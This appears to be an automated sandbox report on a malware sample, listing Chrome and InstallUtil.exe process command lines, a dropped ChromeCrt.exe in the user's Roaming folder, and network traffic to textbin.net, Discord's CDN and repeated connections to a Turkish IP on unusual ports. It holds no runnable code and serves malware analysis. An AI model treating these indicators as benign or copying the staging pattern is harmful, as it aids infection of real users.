"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5872 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5856 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5268 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5668 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=3336 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6236 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6392 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=6308 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6328 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6064 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5160 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=5656 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6632 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=1852 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=7172 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=7420 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=7292 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=6692 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=7788 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=1636 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=5768 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=7384 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=7980 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=7616 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=7252 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=3228 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=6572 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=6900 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=8404 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:2
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.113.22.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.142.81.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | img.guildedcdn.com | udp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 31.219.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.33.253.131.in-addr.arpa | udp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.14.97.104.in-addr.arpa | udp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| US | 8.8.8.8:53 | textbin.net | udp |
| US | 148.72.177.212:443 | textbin.net | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 212.177.72.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| TR | 46.1.103.69:4263 | tcp | |
| US | 8.8.8.8:53 | 69.103.1.46.in-addr.arpa | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| TR | 46.1.103.69:4263 | tcp | |
| TR | 46.1.103.69:7355 | tcp | |
| TR | 46.1.103.69:4263 | tcp | |
| TR | 46.1.103.69:7355 | tcp | |
| US | 8.8.8.8:53 | img.guildedcdn.com | udp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| NL | 13.227.219.31:443 | img.guildedcdn.com | tcp |
| US | 148.72.177.212:443 | textbin.net | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| TR | 46.1.103.69:4263 | tcp | |
| US | 8.8.8.8:53 | 170.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 46.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mediafire.com | udp |
| US | 104.16.113.74:443 | mediafire.com | tcp |
| US | 104.16.113.74:443 | mediafire.com | tcp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 8.8.8.8:53 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| NL | 172.217.168.202:443 | ajax.googleapis.com | tcp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | cdn.amplitude.com | udp |
| US | 104.16.57.101:443 | static.cloudflareinsights.com | tcp |
| US | 18.239.63.113:443 | cdn.amplitude.com | tcp |
| US | 8.8.8.8:53 | 74.113.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.63.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.57.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 54.244.175.36:443 | api.amplitude.com | tcp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| US | 18.239.94.35:443 | static.hotjar.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| NL | 142.250.179.138:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 36.175.244.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.94.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| NL | 142.250.102.156:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| US | 216.239.32.181:443 | analytics.google.com | tcp |
| US | 18.238.243.111:443 | script.hotjar.com | tcp |
| NL | 142.250.102.156:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | device.maxmind.com | udp |
| US | 162.159.134.22:443 | device.maxmind.com | tcp |
| US | 8.8.8.8:53 | 156.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.243.238.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | d-ipv6.mmapiws.com | udp |
| US | 172.64.145.79:443 | d-ipv6.mmapiws.com | tcp |
| US | 8.8.8.8:53 | 79.145.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | app.mediafire.com | udp |
| US | 216.239.32.181:443 | analytics.google.com | udp |
| US | 104.16.113.74:443 | app.mediafire.com | tcp |
| US | 104.16.113.74:443 | app.mediafire.com | tcp |
| US | 8.8.8.8:53 | sessions.bugsnag.com | udp |
| US | 35.190.88.7:443 | sessions.bugsnag.com | tcp |
| US | 35.190.88.7:443 | sessions.bugsnag.com | udp |
| NL | 172.217.168.202:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 7.88.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.mediafireuserupload.com | udp |
| US | 104.16.125.23:443 | www.mediafireuserupload.com | tcp |
| US | 8.8.8.8:53 | 23.125.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | the.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 172.67.144.62:443 | the.gatekeeperconsent.com | tcp |
| US | 104.22.75.216:443 | btloader.com | tcp |
| US | 8.8.8.8:53 | www.ezojs.com | udp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| NL | 142.250.179.206:443 | translate.google.com | tcp |
| US | 172.67.170.144:443 | www.ezojs.com | tcp |
| US | 104.21.28.48:443 | the.gatekeeperconsent.com | tcp |
| US | 104.21.28.48:443 | the.gatekeeperconsent.com | udp |
| US | 172.67.144.62:443 | the.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | cdn.otnolatrnup.com | udp |
| US | 104.19.214.37:443 | cdn.otnolatrnup.com | tcp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| NL | 142.250.179.138:443 | content-autofill.googleapis.com | udp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | 62.144.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.75.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.170.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.28.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.214.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| NL | 142.251.36.10:443 | translate.googleapis.com | tcp |
| DE | 3.67.181.148:443 | g.ezoic.net | tcp |
| US | 8.8.8.8:53 | go.ezodn.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| DE | 172.217.23.194:443 | securepubads.g.doubleclick.net | tcp |
| US | 172.64.136.15:443 | go.ezodn.com | tcp |
| US | 172.64.136.15:443 | go.ezodn.com | tcp |
| US | 172.64.136.15:443 | go.ezodn.com | tcp |
| US | 172.67.144.62:443 | the.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | otnolatrnup.com | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | prebid.media.net | udp |
| US | 8.8.8.8:53 | tlx.3lift.com | udp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| US | 34.120.63.153:443 | prebid.media.net | tcp |
| DE | 3.69.135.220:443 | tlx.3lift.com | tcp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| DE | 52.29.49.248:443 | btlr.sharethrough.com | tcp |
| DE | 52.29.49.248:443 | btlr.sharethrough.com | tcp |
| DE | 52.29.49.248:443 | btlr.sharethrough.com | tcp |
| DE | 52.29.49.248:443 | btlr.sharethrough.com | tcp |
| DE | 52.29.49.248:443 | btlr.sharethrough.com | tcp |
| US | 8.8.8.8:53 | 194.23.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.136.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.181.67.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.189.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.36.251.142.in-addr.arpa | udp |
| US | 172.64.136.15:443 | go.ezodn.com | udp |
| DE | 172.217.23.194:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| NL | 142.250.179.206:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 153.63.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.49.29.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.135.69.3.in-addr.arpa | udp |
| NL | 142.250.179.206:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| NL | 142.251.36.1:443 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | 1.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | eb2.3lift.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| NL | 104.85.0.200:443 | ads.pubmatic.com | tcp |
| NL | 104.85.0.23:443 | contextual.media.net | tcp |
| US | 8.8.8.8:53 | 200.0.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.0.85.104.in-addr.arpa | udp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 8.8.8.8:53 | image6.pubmatic.com | udp |
| GB | 185.64.190.78:443 | image6.pubmatic.com | tcp |
| US | 8.8.8.8:53 | sync.mathtag.com | udp |
| US | 8.8.8.8:53 | dis.criteo.com | udp |
| CH | 185.29.132.241:443 | sync.mathtag.com | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| IE | 52.95.126.160:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | cms.quantserve.com | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | cr.frontend.weborama.fr | udp |
| US | 8.8.8.8:53 | sync.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | um.simpli.fi | udp |
| US | 8.8.8.8:53 | a.audrte.com | udp |
| US | 8.8.8.8:53 | c1.adform.net | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | simage2.pubmatic.com | udp |
| NL | 142.250.179.194:443 | cm.g.doubleclick.net | tcp |
| NL | 142.250.179.194:443 | cm.g.doubleclick.net | tcp |
| NL | 142.250.179.194:443 | cm.g.doubleclick.net | tcp |
| IE | 54.74.78.236:443 | a.audrte.com | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| NL | 35.204.74.118:443 | um.simpli.fi | tcp |
| IE | 52.48.43.143:443 | sync.crwdcntrl.net | tcp |
| NL | 198.47.127.205:443 | simage2.pubmatic.com | tcp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | tcp |
| DK | 37.157.2.230:443 | c1.adform.net | tcp |
| DE | 3.75.62.37:443 | ups.analytics.yahoo.com | tcp |
| DE | 91.228.74.166:443 | cms.quantserve.com | tcp |
| US | 8.8.8.8:53 | 18.111.223.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.132.29.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.126.95.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | image2.pubmatic.com | udp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | udp |
| NL | 142.250.179.194:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 194.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.40.223.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.129.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.74.204.35.in-addr.arpa | udp |
